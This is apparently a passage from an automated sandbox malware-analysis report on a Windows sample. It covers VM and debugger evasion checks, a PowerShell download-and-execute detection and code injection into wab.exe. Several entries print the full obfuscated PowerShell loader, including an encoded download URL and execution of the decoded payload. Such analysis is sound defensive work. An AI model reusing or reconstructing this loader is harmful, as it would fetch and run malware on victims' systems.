Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 4BB833B

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20B60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20C50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 20B60000 memory reserve \| memory write watch	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9921			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 9853			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416

Thread sleep count: 9853 > 30

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: wab.exe, 0000000F.00000002.882847947414.00000000050AE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.882847947414.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.880185049304.00000000050EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000009.00000002.882938896282.0000021672499000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllat
Source: powershell.exe, 0000000D.00000002.878917749751.0000000008746000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 15_2_22C95380 CheckRemoteDebuggerPresent,

15_2_22C95380

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 13_2_02CED8D0 LdrInitializeThunk,LdrInitializeThunk,

13_2_02CED8D0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe

Code function: 16_2_007E2A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

16_2_007E2A7E

Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E3450 SetUnhandledExceptionFilter,		16_2_007E3450
Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe	Code function: 16_2_007E32C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		16_2_007E32C0

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_2680.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6840, type: MEMORYSTR

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EDFB78			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belleric74.Afs && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds nugacities komedianter104 palatalise hygiejnekommsionens redesignating ungrubbed fondshandler fiskeflaaderne discophile curarize anmeldtes refracting hellenizer teknologipolitiks generalstabskorts dubitate blodfattigheds helcology cavillation fallesen alouatta vitial unemptiable datasikkerheds';if (${host}.currentculture) {$smaastykker++;}function immatrikulationens($marios){$syntomy=$marios.length-$smaastykker;$pronenesses='substri';$pronenesses+='ng';for( $dipsomaniacs=2;$dipsomaniacs -lt $syntomy;$dipsomaniacs+=3){$nugacities+=$marios.$pronenesses.invoke( $dipsomaniacs, $smaastykker);}$nugacities;}function influerende($svippedes){ . ($gnier111) ($svippedes);}$sclaffs=immatrikulationens 'humn,ogazhuikal,elbeada/p,5la.fr0ru he(a wpuicun udkuo .wsls l .n step li1 b0fy.p,0.y;i. .ewcaib,ns,6di4te;vi bx,o6e.4,i;no burulvgl:un1co2sy1d.. u0 n)sw igscev c.hkcyono/ c2ch0cu1tr0di0ko1dr0pe1li awf.ni drareorft.osixco/r 1 2re1 j.so0.a ';$dissers=immatrikulationens 'g u es ne .r,e-ida agemes,nsttso ';$redesignating=immatrikulationens ' rhaft ctbeps sku:va/ p/ .datrudif,vovesa. ugtaosko,eg ulsoeca.syc uo emve/,eubeckr?d,ecoxi,p ko ,r stin=,ediro .wk.n.el,rochagld.a&fristd.e=ac1n,t utax o3inpkagrov .qomo mu ayreud.nov0unpmovfifa.0s.s ,1prvchusao,eok.v,upv,zvace 7ar6phtud5 ';$bourre=immatrikulationens 's,>i ';$gnier111=immatrikulationens 'friske ix ';$hoodwinked='fiskeflaaderne';$parastades = immatrikulationens ' fegacf,h fo,r .l%k.a epalpspdjiaoutpeau,%,l\frbmoe ol ylatet rkiipacun7c.4 f.g,ab,f rsek fo&st&k, hecyc dhkloco u.t n ';influerende (immatrikulationens 'ti$exgallidohubbea klsa: .cdehjeahecspocun nn fegur us j1 s7a,2.v=be(caccammads si/tucex co$p.ptwasirdeas.s,ft aaaedreekospe),r ');influerende (immatrikulationens 'sn$s.g olcuofobtuanoll :krhkoybag .idiei,junnske uk oo amvemeksmii oo .nubedenudsw,= t$derjae.jd ee .sbiiingopn,sayat risonfeg t.c.s.vpb.lgei stun(fa$ ub o au.tr frbyep.) ');influerende (immatrikulationens ' t[ in ieurtps.p s,berer iv .iticreedupplo iiafno,tlims,alin ta hg mekordi]no:fi: spre,gcs,utir iunt,eyampbrrceo ettrouscstosvl e ,o= t i [anndreunt.k.f sdeewectuu .r.hi ,t,myatp.tr sohitfoom,cduo lunt.uy apsle r] l:s.: ,toflsmspa1un2 a ');$redesignating=$hygiejnekommsionens[0];$fangstbaaden190= (immatrikulationens 'am$,igunlhaoeqbkla.al,e:.lkcoosun ,sfoe rk mvteec,nl,thjeposos=.mnfieopws -w,o ab .jbleincdetca ths pyresanttee .mmu.epn kep.t a.s,wsoe,ebovc .lfaikbea.nlkt');$fangstbaaden190+=$chaconners172[1];influerende ($fangstbaaden190);influerende (immatrikulationens 'ar$tokfookvnovsk.edok,	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
